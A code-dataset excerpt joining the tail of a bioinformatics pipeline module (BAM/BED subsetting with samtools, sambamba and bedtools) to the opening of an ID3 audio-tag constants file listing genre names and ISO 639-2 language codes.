return _do_work
def write_nochr_reads(in_file, out_file, config):
"""Write a BAM file of reads that are not mapped on a reference chromosome.
This is useful for maintaining non-mapped reads in parallel processes
that split processing by chromosome.
"""
if not file_exists(out_file):
with file_transaction(config, out_file) as tx_out_file:
samtools = config_utils.get_program("samtools", config)
cmd = "{samtools} view -b -f 4 {in_file} > {tx_out_file}"
do.run(cmd.format(**locals()), "Select unmapped reads")
return out_file
def write_noanalysis_reads(in_file, region_file, out_file, config):
"""Write a BAM file of reads in the specified region file that are not analyzed.
We want to get only reads not in analysis regions but also make use of
the BAM index to perform well on large files. The tricky part is avoiding
command line limits. There is a nice discussion on SeqAnswers:
http://seqanswers.com/forums/showthread.php?t=29538
sambamba supports intersection via an input BED file so avoids command line
length issues.
"""
if not file_exists(out_file):
with file_transaction(config, out_file) as tx_out_file:
bedtools = config_utils.get_program("bedtools", config)
sambamba = config_utils.get_program("sambamba", config)
cl = ("{sambamba} view -f bam -L {region_file} {in_file} | "
"{bedtools} intersect -abam - -b {region_file} -f 1.0 "
"> {tx_out_file}")
do.run(cl.format(**locals()), "Select unanalyzed reads")
return out_file
def subset_bam_by_region(in_file, region, config, out_file_base=None):
"""Subset BAM files based on specified chromosome region.
"""
if out_file_base is not None:
base, ext = os.path.splitext(out_file_base)
else:
base, ext = os.path.splitext(in_file)
out_file = "%s-subset%s%s" % (base, region, ext)
if not file_exists(out_file):
with closing(pysam.Samfile(in_file, "rb")) as in_bam:
target_tid = in_bam.gettid(region)
assert region is not None, \
"Did not find reference region %s in %s" % \
(region, in_file)
with file_transaction(config, out_file) as tx_out_file:
with closing(pysam.Samfile(tx_out_file, "wb", template=in_bam)) as out_bam:
for read in in_bam:
if read.tid == target_tid:
out_bam.write(read)
return out_file
def _rewrite_bed_with_chrom(in_file, out_file, chrom):
with open(in_file) as in_handle:
with open(out_file, "w") as out_handle:
for line in in_handle:
if line.startswith("%s\t" % chrom):
out_handle.write(line)
def _subset_bed_by_region(in_file, out_file, region, do_merge=True):
import pybedtools
orig_bed = pybedtools.BedTool(in_file)
region_bed = pybedtools.BedTool("\t".join(str(x) for x in region) + "\n", from_string=True)
if do_merge:
orig_bed.intersect(region_bed).filter(lambda x: len(x) > 5).merge().saveas(out_file)
else:
orig_bed.intersect(region_bed).filter(lambda x: len(x) > 5).saveas(out_file)
def get_lcr_bed(items):
lcr_bed = utils.get_in(items[0], ("genome_resources", "variation", "lcr"))
do_lcr = any([utils.get_in(data, ("config", "algorithm", "remove_lcr"), False)
for data in items])
if do_lcr and lcr_bed and os.path.exists(lcr_bed):
return lcr_bed
def remove_lcr_regions(orig_bed, items):
"""If configured and available, update a BED file to remove low complexity regions.
"""
import pybedtools
lcr_bed = get_lcr_bed(items)
if lcr_bed:
nolcr_bed = os.path.join("%s-nolcr.bed" % (utils.splitext_plus(orig_bed)[0]))
with file_transaction(items[0], nolcr_bed) as tx_nolcr_bed:
pybedtools.BedTool(orig_bed).subtract(pybedtools.BedTool(lcr_bed)).saveas(tx_nolcr_bed)
# If we have a non-empty file, convert to the LCR subtracted for downstream analysis
if utils.file_exists(nolcr_bed):
orig_bed = nolcr_bed
return orig_bed
@contextmanager
def bedtools_tmpdir(data):
import pybedtools
with tx_tmpdir(data) as tmpdir:
orig_tmpdir = tempfile.gettempdir()
pybedtools.set_tempdir(tmpdir)
yield
if orig_tmpdir and os.path.exists(orig_tmpdir):
pybedtools.set_tempdir(orig_tmpdir)
else:
tempfile.tempdir = None
def subtract_low_complexity(f):
"""Remove low complexity regions from callable regions if available.
"""
@functools.wraps(f)
def wrapper(variant_regions, region, out_file, items=None, do_merge=True):
region_bed = f(variant_regions, region, out_file, items, do_merge)
if region_bed and isinstance(region_bed, basestring) and os.path.exists(region_bed) and items:
region_bed = remove_lcr_regions(region_bed, items)
return region_bed
return wrapper
@subtract_low_complexity
def subset_variant_regions(variant_regions, region, out_file, items=None, do_merge=True):
"""Return BED file subset by a specified chromosome region.
variant_regions is a BED file, region is a chromosome name or tuple
of (name, start, end) for a genomic region.
"""
if region is None:
return variant_regions
elif variant_regions is None:
return region
elif not isinstance(region, (list, tuple)) and region.find(":") > 0:
raise ValueError("Partial chromosome regions not supported")
else:
merge_text = "-unmerged" if not do_merge else ""
subset_file = "{0}".format(utils.splitext_plus(out_file)[0])
subset_file += "%s-regions.bed" % (merge_text)
if not os.path.exists(subset_file):
with file_transaction(items[0] if items else None, subset_file) as tx_subset_file:
if isinstance(region, (list, tuple)):
_subset_bed_by_region(variant_regions, tx_subset_file, region, do_merge = do_merge)
else:
_rewrite_bed_with_chrom(variant_regions, tx_subset_file, region)
if os.path.getsize(subset_file) == 0:
return region
else:
return subset_file
|
SciLifeLab/bcbio-nextgen
|
bcbio/pipeline/shared.py
|
Python
|
mit
| 8,867
|
[
"pysam"
] |
51e7cf5210841458e8ff822c55fec4216763109d756edc7995db2ace5a797329
|
# coding=utf-8
__author__ = "Peter Klassen peter@mediadock.org"
__license__ = "MIT License"
__copyright__ = "(c) 2019 Peter Klassen peter@mediadock.org"
# versions
ID3v1_VERSION = 'ID3v1'
ID3v1_1_VERSION = 'ID3v1.1'
ID3v2_2_VERSION = 'ID3v2.2'
ID3v2_3_VERSION = 'ID3v2.3'
ID3v2_4_VERSION = 'ID3v2.4'
# ID3v1 genres
class ID3v1_GENERES(object):
GENRE_2_NAME = dict()
BLUES = 0
BLUES_NAME = 'Blues'
GENRE_2_NAME[BLUES] = BLUES_NAME
CLASSIC_ROCK = 1
CLASSIC_ROCK_NAME = 'Classic Rock'
GENRE_2_NAME[CLASSIC_ROCK] = CLASSIC_ROCK_NAME
COUNTY = 2
COUNTY_NAME = 'Country'
GENRE_2_NAME[COUNTY] = COUNTY_NAME
DANCE = 3
DANCE_NAME = 'Dance'
GENRE_2_NAME[DANCE] = DANCE_NAME
DISCO = 4
DISCO_NAME = 'Disco'
GENRE_2_NAME[DISCO] = DISCO_NAME
FUNK = 5
FUNK_NAME = 'Funk'
GENRE_2_NAME[FUNK] = FUNK_NAME
GRUNGE = 6
GRUNGE_NAME = 'Grunge'
GENRE_2_NAME[GRUNGE] = GRUNGE_NAME
HIP_HOP = 7
HIP_HOP_NAME = 'Hip-Hop'
GENRE_2_NAME[HIP_HOP] = HIP_HOP_NAME
JAZZ = 8
JAZZ_NAME = 'Jazz'
GENRE_2_NAME[JAZZ] = JAZZ_NAME
METAL = 9
METAL_NAME = 'Metal'
GENRE_2_NAME[METAL] = METAL_NAME
NEW_AGE = 10
NEW_AGE_NAME = 'New Age'
GENRE_2_NAME[NEW_AGE] = NEW_AGE_NAME
OLDIES = 11
OLDIES_NAME = 'Oldies'
GENRE_2_NAME[OLDIES] = OLDIES_NAME
OTHER = 12
OTHER_NAME = 'Other'
GENRE_2_NAME[OTHER] = OTHER_NAME
POP = 13
POP_NAME = 'Pop'
GENRE_2_NAME[POP] = POP_NAME
R_B = 14
R_B_NAME = 'R&B'
GENRE_2_NAME[R_B] = R_B_NAME
RAP = 15
RAP_NAME = 'Rap'
GENRE_2_NAME[RAP] = RAP_NAME
REGGAE = 16
REGGAE_NAME = 'Reggae'
GENRE_2_NAME[REGGAE] = REGGAE_NAME
ROCK = 17
ROCK_NAME = 'Rock'
GENRE_2_NAME[ROCK] = ROCK_NAME
TECHNO = 18
TECHNO_NAME = 'Techno'
GENRE_2_NAME[TECHNO] = TECHNO_NAME
INDUSTRIAL = 19
INDUSTRIAL_NAME = 'Industrial'
GENRE_2_NAME[INDUSTRIAL] = INDUSTRIAL_NAME
ALTERNATIVE = 20
ALTERNATIVE_NAME = 'Alternative'
GENRE_2_NAME[ALTERNATIVE] = ALTERNATIVE_NAME
SKA = 21
SKA_NAME = 'Ska'
GENRE_2_NAME[SKA] = SKA_NAME
DEATH_METAL = 22
DEATH_METAL_NAME = 'Death Metal'
GENRE_2_NAME[DEATH_METAL] = DEATH_METAL_NAME
PRANKS = 23
PRANKS_NAME = 'Pranks'
GENRE_2_NAME[PRANKS] = PRANKS_NAME
SOUNDTRACK = 24
SOUNDTRACK_NAME = 'Soundtrack'
GENRE_2_NAME[SOUNDTRACK] = SOUNDTRACK_NAME
EURO_TECHNO = 25
EURO_TECHNO_NAME = 'Euro-Techno'
GENRE_2_NAME[EURO_TECHNO] = EURO_TECHNO_NAME
AMBIENT = 26
AMBIENT_NAME = 'Ambient'
GENRE_2_NAME[AMBIENT] = AMBIENT_NAME
TRIP_HOP = 27
TRIP_HOP_NAME = 'Trip-Hop'
GENRE_2_NAME[TRIP_HOP] = TRIP_HOP_NAME
VOCAL = 28
VOCAL_NAME = 'Vocal'
GENRE_2_NAME[VOCAL] = VOCAL_NAME
JAZZ_FUNK = 29
JAZZ_FUNK_NAME = 'Jazz+Funk'
GENRE_2_NAME[JAZZ_FUNK] = JAZZ_FUNK_NAME
FUSION = 30
FUSION_NAME = 'Fusion'
GENRE_2_NAME[FUSION] = FUSION_NAME
TRANCE = 31
TRANCE_NAME = 'Trance'
GENRE_2_NAME[TRANCE] = TRANCE_NAME
CLASSICIAL = 32
CLASSICIAL_NAME = 'Classical'
GENRE_2_NAME[CLASSICIAL] = CLASSICIAL_NAME
INSTRUMENTAL = 33
INSTRUMENTAL_NAME = 'Instrumental'
GENRE_2_NAME[INSTRUMENTAL] = INSTRUMENTAL_NAME
ACID = 34
ACID_NAME = 'Acid'
GENRE_2_NAME[ACID] = ACID_NAME
HOUSE = 35
HOUSE_NAME = 'House'
GENRE_2_NAME[HOUSE] = HOUSE_NAME
GAME = 36
GAME_NAME = 'Game'
GENRE_2_NAME[GAME] = GAME_NAME
SOUND_CLIP = 37
SOUND_CLIP_NAME = 'Sound Clip'
GENRE_2_NAME[SOUND_CLIP] = SOUND_CLIP_NAME
GOSPEL = 38
GOSPEL_NAME = 'Gospel'
GENRE_2_NAME[GOSPEL] = GOSPEL_NAME
NOISE = 39
NOISE_NAME = 'Noise'
GENRE_2_NAME[NOISE] = NOISE_NAME
ALTERNROCK = 40
ALTERNROCK_NAME = 'AlternRock'
GENRE_2_NAME[ALTERNROCK] = ALTERNROCK_NAME
BASS = 41
BASS_NAME = 'Bass'
GENRE_2_NAME[BASS] = BASS_NAME
SOUL = 42
SOUL_NAME = 'Soul'
GENRE_2_NAME[SOUL] = SOUL_NAME
PUNK = 43
PUNK_NAME = 'Punk'
GENRE_2_NAME[PUNK] = PUNK_NAME
SPACE = 44
SPACE_NAME = 'Space'
GENRE_2_NAME[SPACE] = SPACE_NAME
MEDITATIVE = 45
MEDITATIVE_NAME = 'Meditative'
GENRE_2_NAME[MEDITATIVE] = MEDITATIVE_NAME
INSTRUMENTAL_POP = 46
INSTRUMENTAL_POP_NAME = 'Instrumental Pop'
GENRE_2_NAME[INSTRUMENTAL_POP] = INSTRUMENTAL_POP_NAME
INSTRUMENTAL_ROCK = 47
INSTRUMENTAL_ROCK_NAME = 'Instrumental Rock'
GENRE_2_NAME[INSTRUMENTAL_ROCK] = INSTRUMENTAL_ROCK_NAME
ETHNIC = 48
ETHNIC_NAME = 'Ethnic'
GENRE_2_NAME[ETHNIC] = ETHNIC_NAME
GOTHIC = 49
GOTHIC_NAME = 'Gothic'
GENRE_2_NAME[GOTHIC] = GOTHIC_NAME
DARKWAVE = 50
DARKWAVE_NAME = 'Darkwave'
GENRE_2_NAME[DARKWAVE] = DARKWAVE_NAME
TECHNO_INDUSTRIAL = 51
TECHNO_INDUSTRIAL_NAME = 'Techno-Industrial'
GENRE_2_NAME[TECHNO_INDUSTRIAL] = TECHNO_INDUSTRIAL_NAME
ELECTRONIC = 52
ELECTRONIC_NAME = 'Electronic'
GENRE_2_NAME[ELECTRONIC] = ELECTRONIC_NAME
POP_FOLK = 53
POP_FOLK_NAME = 'Pop-Folk'
GENRE_2_NAME[POP_FOLK] = POP_FOLK_NAME
EURODANCE = 54
EURODANCE_NAME = 'Eurodance'
GENRE_2_NAME[EURODANCE] = EURODANCE_NAME
DREAM = 55
DREAM_NAME = 'Dream'
GENRE_2_NAME[DREAM] = DREAM_NAME
SOUTHERN_ROCK = 56
SOUTHERN_ROCK_NAME = 'Southern Rock'
GENRE_2_NAME[SOUTHERN_ROCK] = SOUTHERN_ROCK_NAME
COMEDY = 57
COMEDY_NAME = 'Comedy'
GENRE_2_NAME[COMEDY] = COMEDY_NAME
CULT = 58
CULT_NAME = 'Cult'
GENRE_2_NAME[CULT] = CULT_NAME
GANGSTA = 59
GANGSTA_NAME = 'Gangsta'
GENRE_2_NAME[GANGSTA] = GANGSTA_NAME
TOP_40 = 60
TOP_40_NAME = 'Top 40'
GENRE_2_NAME[TOP_40] = TOP_40_NAME
CHRISTIAN_RAP = 61
CHRISTIAN_RAP_NAME = 'Christian Rap'
GENRE_2_NAME[CHRISTIAN_RAP] = CHRISTIAN_RAP_NAME
POP_FUNK = 62
POP_FUNK_NAME = 'Pop/Funk'
GENRE_2_NAME[POP_FUNK] = POP_FUNK_NAME
JUNGLE = 63
JUNGLE_NAME = 'Jungle'
GENRE_2_NAME[JUNGLE] = JUNGLE_NAME
NATIVE_AMERICAN = 64
NATIVE_AMERICAN_NAME = 'Native American'
GENRE_2_NAME[NATIVE_AMERICAN] = NATIVE_AMERICAN_NAME
CABARET = 65
CABARET_NAME = 'Cabaret'
GENRE_2_NAME[CABARET] = CABARET_NAME
NEW_WAVE = 66
NEW_WAVE_NAME = 'New Wave'
GENRE_2_NAME[NEW_WAVE] = NEW_WAVE_NAME
PSYCHADELIC = 67
PSYCHADELIC_NAME = 'Psychadelic'
GENRE_2_NAME[PSYCHADELIC] = PSYCHADELIC_NAME
RAVE = 68
RAVE_NAME = 'Rave'
GENRE_2_NAME[RAVE] = RAVE_NAME
SHOWTUNES = 69
SHOWTUNES_NAME = 'Showtunes'
GENRE_2_NAME[SHOWTUNES] = SHOWTUNES_NAME
TRAILER = 70
TRAILER_NAME = 'Trailer'
GENRE_2_NAME[TRAILER] = TRAILER_NAME
LO_FI = 71
LO_FI_NAME = 'Lo-Fi'
GENRE_2_NAME[LO_FI] = LO_FI_NAME
TRIBAL = 72
TRIBAL_NAME = 'Tribal'
GENRE_2_NAME[TRIBAL] = TRIBAL_NAME
ACID_PUNK = 73
ACID_PUNK_NAME = 'Acid Punk'
GENRE_2_NAME[ACID_PUNK] = ACID_PUNK_NAME
ACID_JAZZ = 74
ACID_JAZZ_NAME = 'Acid Jazz'
GENRE_2_NAME[ACID_JAZZ] = ACID_JAZZ_NAME
POLKA = 75
POLKA_NAME = 'Polka'
GENRE_2_NAME[POLKA] = POLKA_NAME
RETRO = 76
RETRO_NAME = 'Retro'
GENRE_2_NAME[RETRO] = RETRO_NAME
MUSICAL = 77
MUSICAL_NAME = 'Musical'
GENRE_2_NAME[MUSICAL] = MUSICAL_NAME
ROCK_N_ROLL = 78
ROCK_N_ROLL_NAME = 'Rock & Roll'
GENRE_2_NAME[ROCK_N_ROLL] = ROCK_N_ROLL_NAME
HARD_ROCK = 79
HARD_ROCK_NAME = 'Hard Rock'
GENRE_2_NAME[HARD_ROCK] = HARD_ROCK_NAME
FOLK = 80
FOLK_NAME = 'Folk'
GENRE_2_NAME[FOLK] = FOLK_NAME
FOLK_ROCK = 81
FOLK_ROCK_NAME = 'Folk-Rock'
GENRE_2_NAME[FOLK_ROCK] = FOLK_ROCK_NAME
NATIONAL_FOLK = 82
NATIONAL_FOLK_NAME = 'National Folk'
GENRE_2_NAME[NATIONAL_FOLK] = NATIONAL_FOLK_NAME
SWING = 83
SWING_NAME = 'Swing'
GENRE_2_NAME[SWING] = SWING_NAME
FAST_FUSION = 84
FAST_FUSION_NAME = 'Fast Fusion'
GENRE_2_NAME[FAST_FUSION] = FAST_FUSION_NAME
BEBOB = 85
BEBOB_NAME = 'Bebob'
GENRE_2_NAME[BEBOB] = BEBOB_NAME
LATIN = 86
LATIN_NAME = 'Latin'
GENRE_2_NAME[LATIN] = LATIN_NAME
REVIVAL = 87
REVIVAL_NAME = 'Revival'
GENRE_2_NAME[REVIVAL] = REVIVAL_NAME
CELTIC = 88
CELTIC_NAME = 'Celtic'
GENRE_2_NAME[CELTIC] = CELTIC_NAME
BLUEGRASS = 89
BLUEGRASS_NAME = 'Bluegrass'
GENRE_2_NAME[BLUEGRASS] = BLUEGRASS_NAME
AVANTGARDE = 90
AVANTGARDE_NAME = 'Avantgarde'
GENRE_2_NAME[AVANTGARDE] = AVANTGARDE_NAME
GOTHIC_ROCK = 91
GOTHIC_ROCK_NAME = 'Gothic Rock'
GENRE_2_NAME[GOTHIC_ROCK] = GOTHIC_ROCK_NAME
PROGRESSIVE_ROCK = 92
PROGRESSIVE_ROCK_NAME = 'Progressive Rock'
GENRE_2_NAME[PROGRESSIVE_ROCK] = PROGRESSIVE_ROCK_NAME
PSYCHEDELIC_ROCK = 93
PSYCHEDELIC_ROCK_NAME = 'Psychedelic Rock'
GENRE_2_NAME[PSYCHEDELIC_ROCK] = PSYCHEDELIC_ROCK_NAME
SYMPHONIC_ROCK = 94
SYMPHONIC_ROCK_NAME = 'Symphonic Rock'
GENRE_2_NAME[SYMPHONIC_ROCK] = SYMPHONIC_ROCK_NAME
SLOW_ROCK = 95
SLOW_ROCK_NAME = 'Slow Rock'
GENRE_2_NAME[SLOW_ROCK] = SLOW_ROCK_NAME
BIG_BAND = 96
BIG_BAND_NAME = 'Big Band'
GENRE_2_NAME[BIG_BAND] = BIG_BAND_NAME
CHORUS = 97
CHORUS_NAME = 'Chorus'
GENRE_2_NAME[CHORUS] = CHORUS_NAME
EASY_LISTENING = 98
EASY_LISTENING_NAME = 'Easy Listening'
GENRE_2_NAME[EASY_LISTENING] = EASY_LISTENING_NAME
ACOUSTIC = 99
ACOUSTIC_NAME = 'Acoustic'
GENRE_2_NAME[ACOUSTIC] = ACOUSTIC_NAME
HUMOR = 100
HUMOR_NAME = 'Humour'
GENRE_2_NAME[HUMOR] = HUMOR_NAME
SPEECH = 101
SPEECH_NAME = 'Speech'
GENRE_2_NAME[SPEECH] = SPEECH_NAME
CHANSON = 102
CHANSON_NAME = 'Chanson'
GENRE_2_NAME[CHANSON] = CHANSON_NAME
OPERA = 103
OPERA_NAME = 'Opera'
GENRE_2_NAME[OPERA] = OPERA_NAME
CHAMBER_MUSIC = 104
CHAMBER_MUSIC_NAME = 'Chamber Music'
GENRE_2_NAME[CHAMBER_MUSIC] = CHAMBER_MUSIC_NAME
SONATA = 105
SONATA_NAME = 'Sonata'
GENRE_2_NAME[SONATA] = SONATA_NAME
SYMPHONY = 106
SYMPHONY_NAME = 'Symphony'
GENRE_2_NAME[SYMPHONY] = SYMPHONY_NAME
BOOTY_BASS = 107
BOOTY_BASS_NAME = 'Booty Bass'
GENRE_2_NAME[BOOTY_BASS] = BOOTY_BASS_NAME
PRIMUS = 108
PRIMUS_NAME = 'Primus'
GENRE_2_NAME[PRIMUS] = PRIMUS_NAME
PORN_GROOVE = 109
PORN_GROOVE_NAME = 'Porn Groove'
GENRE_2_NAME[PORN_GROOVE] = PORN_GROOVE_NAME
SATRIRE = 110
SATRIRE_NAME = 'Satire'
GENRE_2_NAME[SATRIRE] = SATRIRE_NAME
SLOW_JAM = 111
SLOW_JAM_NAME = 'Slow Jam'
GENRE_2_NAME[SLOW_JAM] = SLOW_JAM_NAME
CLUB = 112
CLUB_NAME = 'Club'
GENRE_2_NAME[CLUB] = CLUB_NAME
TANGO = 113
TANGO_NAME = 'Tango'
GENRE_2_NAME[TANGO] = TANGO_NAME
SAMBA = 114
SAMBA_NAME = 'Samba'
GENRE_2_NAME[SAMBA] = SAMBA_NAME
FOLKLORE = 115
FOLKLORE_NAME = 'Folklore'
GENRE_2_NAME[FOLKLORE] = FOLKLORE_NAME
BALLAD = 116
BALLAD_NAME = 'Ballad'
GENRE_2_NAME[BALLAD] = BALLAD_NAME
POWER_BALLAD = 117
POWER_BALLAD_NAME = 'Power Ballad'
GENRE_2_NAME[POWER_BALLAD] = POWER_BALLAD_NAME
RHYTHMIC_SOUL = 118
RHYTHMIC_SOUL_NAME = 'Rhythmic Soul'
GENRE_2_NAME[RHYTHMIC_SOUL] = RHYTHMIC_SOUL_NAME
FREESTYLE = 119
FREESTYLE_NAME = 'Freestyle'
GENRE_2_NAME[FREESTYLE] = FREESTYLE_NAME
DUET = 120
DUET_NAME = 'Duet'
GENRE_2_NAME[DUET] = DUET_NAME
PUNK_ROCK = 121
PUNK_ROCK_NAME = 'Punk Rock'
GENRE_2_NAME[PUNK_ROCK] = PUNK_ROCK_NAME
DRUM_SOLO = 122
DRUM_SOLO_NAME = 'Drum Solo'
GENRE_2_NAME[DRUM_SOLO] = DRUM_SOLO_NAME
A_CAPELLA = 123
A_CAPELLA_NAME = 'A capella'
GENRE_2_NAME[A_CAPELLA] = A_CAPELLA_NAME
EURO_HOUSE = 124
EURO_HOUSE_NAME = 'Euro-House'
GENRE_2_NAME[EURO_HOUSE] = EURO_HOUSE_NAME
DANCE_HALL = 125
DANCE_HALL_NAME = 'Dance Hall'
GENRE_2_NAME[DANCE_HALL] = DANCE_HALL_NAME
GOA = 126
GOA_NAME = 'Goa'
GENRE_2_NAME[GOA] = GOA_NAME
DRUM_N_BASS = 127
DRUM_N_BASS_NAME = 'Drum & Bass'
GENRE_2_NAME[DRUM_N_BASS] = DRUM_N_BASS_NAME
CLUB_HOUSE = 128
CLUB_HOUSE_NAME = 'Club-House'
GENRE_2_NAME[CLUB_HOUSE] = CLUB_HOUSE_NAME
HARDCORE = 129
HARDCORE_NAME = 'Hardcore'
GENRE_2_NAME[HARDCORE] = HARDCORE_NAME
TERROR = 130
TERROR_NAME = 'Terror'
GENRE_2_NAME[TERROR] = TERROR_NAME
INDIE = 131
INDIE_NAME = 'Indie'
GENRE_2_NAME[INDIE] = INDIE_NAME
BRITPOP = 132
BRITPOP_NAME = 'BritPop'
GENRE_2_NAME[BRITPOP] = BRITPOP_NAME
NEGERPUNK = 133
NEGERPUNK_NAME = 'Negerpunk'
GENRE_2_NAME[NEGERPUNK] = NEGERPUNK_NAME
POLSK_PUNK = 134
POLSK_PUNK_NAME = 'Polsk Punk'
GENRE_2_NAME[POLSK_PUNK] = POLSK_PUNK_NAME
BEAT = 135
BEAT_NAME = 'Beat'
GENRE_2_NAME[BEAT] = BEAT_NAME
CHRISTIAN = 136
CHRISTIAN_NAME = 'Christian'
GENRE_2_NAME[CHRISTIAN] = CHRISTIAN_NAME
HEAVY_METAL = 137
HEAVY_METAL_NAME = 'Heavy Metal'
GENRE_2_NAME[HEAVY_METAL] = HEAVY_METAL_NAME
BLACK_METAL = 138
BLACK_METAL_NAME = 'Black Metal'
GENRE_2_NAME[BLACK_METAL] = BLACK_METAL_NAME
CROSSOVER = 139
CROSSOVER_NAME = 'Crossover'
GENRE_2_NAME[CROSSOVER] = CROSSOVER_NAME
CONTEMPORARY = 140
CONTEMPORARY_NAME = 'Contemporary'
GENRE_2_NAME[CONTEMPORARY] = CONTEMPORARY_NAME
CHRISTIAN_ROCK = 141
CHRISTIAN_ROCK_NAME = 'Christian Rock'
GENRE_2_NAME[CHRISTIAN_ROCK] = CHRISTIAN_ROCK_NAME
MERENGUE = 142
MERENGUE_NAME = 'Merengue'
GENRE_2_NAME[MERENGUE] = MERENGUE_NAME
SALSA = 143
SALSA_NAME = 'Salsa'
GENRE_2_NAME[SALSA] = SALSA_NAME
THRASH_METAL = 144
THRASH_METAL_NAME = 'Thrash Metal'
GENRE_2_NAME[THRASH_METAL] = THRASH_METAL_NAME
ANIME = 145
ANIME_NAME = 'Anime'
GENRE_2_NAME[ANIME] = ANIME_NAME
JPOP = 146
JPOP_NAME = 'JPop'
GENRE_2_NAME[JPOP] = JPOP_NAME
SYNTHPOP = 147
SYNTHPOP_NAME = 'Synthpop'
GENRE_2_NAME[SYNTHPOP] = SYNTHPOP_NAME
class ID3v2_3ENCODING(object):
ISO_8859_1 = '\x00'
UNICODE = '\x01'
ID3v2_3_ENCODING_DICT = {ID3v2_3ENCODING.ISO_8859_1: 'latin-1', ID3v2_3ENCODING.UNICODE: 'utf-16'}
LANGUAGE_CODES_ISO_639_2_DICT = {
'aar': 'Afar',
'abk': 'Abkhazian',
'ace': 'Achinese',
'ach': 'Acoli',
'ada': 'Adangme',
'ady': 'Adyghe; Adygei',
'afa': 'Afro-Asiatic languages',
'afh': 'Afrihili',
'afr': 'Afrikaans',
'ain': 'Ainu',
'aka': 'Akan',
'akk': 'Akkadian',
'alb': 'Albanian',
'ale': 'Aleut',
'alg': 'Algonquian languages',
'alt': 'Southern Altai',
'amh': 'Amharic',
'ang': 'English, Old (ca.450-1100)',
'anp': 'Angika',
'apa': 'Apache languages',
'ara': 'Arabic',
'arc': 'Official Aramaic (700-300 BCE); Imperial Aramaic (700-300 BCE)',
'arg': 'Aragonese',
'arm': 'Armenian',
'arn': 'Mapudungun; Mapuche',
'arp': 'Arapaho',
'art': 'Artificial languages',
'arw': 'Arawak',
'asm': 'Assamese',
'ast': 'Asturian; Bable; Leonese; Asturleonese',
'ath': 'Athapascan languages',
'aus': 'Australian languages',
'ava': 'Avaric',
'ave': 'Avestan',
'awa': 'Awadhi',
'aym': 'Aymara',
'aze': 'Azerbaijani',
'bad': 'Banda languages',
'bai': 'Bamileke languages',
'bak': 'Bashkir',
'bal': 'Baluchi',
'bam': 'Bambara',
'ban': 'Balinese',
'baq': 'Basque',
'bas': 'Basa',
'bat': 'Baltic languages',
'bej': 'Beja; Bedawiyet',
'bel': 'Belarusian',
'bem': 'Bemba',
'ben': 'Bengali',
'ber': 'Berber languages',
'bho': 'Bhojpuri',
'bih': 'Bihari languages',
'bik': 'Bikol',
'bin': 'Bini; Edo',
'bis': 'Bislama',
'bla': 'Siksika',
'bnt': 'Bantu languages',
'bod': 'Tibetan',
'bos': 'Bosnian',
'bra': 'Braj',
'bre': 'Breton',
'btk': 'Batak languages',
'bua': 'Buriat',
'bug': 'Buginese',
'bul': 'Bulgarian',
'bur': 'Burmese',
'byn': 'Blin; Bilin',
'cad': 'Caddo',
'cai': 'Central American Indian languages',
'car': 'Galibi Carib',
'cat': 'Catalan; Valencian',
'cau': 'Caucasian languages',
'ceb': 'Cebuano',
'cel': 'Celtic languages',
'ces': 'Czech',
'cha': 'Chamorro',
'chb': 'Chibcha',
'che': 'Chechen',
'chg': 'Chagatai',
'chi': 'Chinese',
'chk': 'Chuukese',
'chm': 'Mari',
'chn': 'Chinook jargon',
'cho': 'Choctaw',
'chp': 'Chipewyan; Dene Suline',
'chr': 'Cherokee',
'chu': 'Church Slavic; Old Slavonic; Church Slavonic; Old Bulgarian; Old Church Slavonic',
'chv': 'Chuvash',
'chy': 'Cheyenne',
'cmc': 'Chamic languages',
'cnr': 'Montenegrin',
'cop': 'Coptic',
'cor': 'Cornish',
'cos': 'Corsican',
'cpe': 'Creoles and pidgins, English based',
'cpf': 'Creoles and pidgins, French-based',
'cpp': 'Creoles and pidgins, Portuguese-based',
'cre': 'Cree',
'crh': 'Crimean Tatar; Crimean Turkish',
'crp': 'Creoles and pidgins',
'csb': 'Kashubian',
'cus': 'Cushitic languages',
'cym': 'Welsh',
'cze': 'Czech',
'dak': 'Dakota',
'dan': 'Danish',
'dar': 'Dargwa',
'day': 'Land Dayak languages',
'del': 'Delaware',
'den': 'Slave (Athapascan)',
'deu': 'German',
'dgr': 'Dogrib',
'din': 'Dinka',
'div': 'Divehi; Dhivehi; Maldivian',
'doi': 'Dogri',
'dra': 'Dravidian languages',
'dsb': 'Lower Sorbian',
'dua': 'Duala',
'dum': 'Dutch, Middle (ca.1050-1350)',
'dut': 'Dutch; Flemish',
'dyu': 'Dyula',
'dzo': 'Dzongkha',
'efi': 'Efik',
'egy': 'Egyptian (Ancient)',
'eka': 'Ekajuk',
'ell': 'Greek, Modern (1453-)',
'elx': 'Elamite',
'eng': 'English',
'enm': 'English, Middle (1100-1500)',
'epo': 'Esperanto',
'est': 'Estonian',
'eus': 'Basque',
'ewe': 'Ewe',
'ewo': 'Ewondo',
'fan': 'Fang',
'fao': 'Faroese',
'fas': 'Persian',
'fat': 'Fanti',
'fij': 'Fijian',
'fil': 'Filipino; Pilipino',
'fin': 'Finnish',
'fiu': 'Finno-Ugrian languages',
'fon': 'Fon',
'fre': 'French',
'fra': 'French',
'frm': 'French, Middle (ca.1400-1600)',
'fro': 'French, Old (842-ca.1400)',
'frr': 'Northern Frisian',
'frs': 'Eastern Frisian',
'fry': 'Western Frisian',
'ful': 'Fulah',
'fur': 'Friulian',
'gaa': 'Ga',
'gay': 'Gayo',
'gba': 'Gbaya',
'gem': 'Germanic languages',
'geo': 'Georgian',
'ger': 'German',
'gez': 'Geez',
'gil': 'Gilbertese',
'gla': 'Gaelic; Scottish Gaelic',
'gle': 'Irish',
'glg': 'Galician',
'glv': 'Manx',
'gmh': 'German, Middle High (ca.1050-1500)',
'goh': 'German, Old High (ca.750-1050)',
'gon': 'Gondi',
'gor': 'Gorontalo',
'got': 'Gothic',
'grb': 'Grebo',
'grc': 'Greek, Ancient (to 1453)',
'gre': 'Greek, Modern (1453-)',
'grn': 'Guarani',
'gsw': 'Swiss German; Alemannic; Alsatian',
'guj': 'Gujarati',
'gwi': 'Gwich\'in',
'hai': 'Haida',
'hat': 'Haitian; Haitian Creole',
'hau': 'Hausa',
'haw': 'Hawaiian',
'heb': 'Hebrew',
'her': 'Herero',
'hil': 'Hiligaynon',
'him': 'Himachali languages; Western Pahari languages',
'hin': 'Hindi',
'hit': 'Hittite',
'hmn': 'Hmong; Mong',
'hmo': 'Hiri Motu',
'hrv': 'Croatian',
'hsb': 'Upper Sorbian',
'hun': 'Hungarian',
'hup': 'Hupa',
'hye': 'Armenian',
'iba': 'Iban',
'ibo': 'Igbo',
'ice': 'Icelandic',
'isl': 'Icelandic',
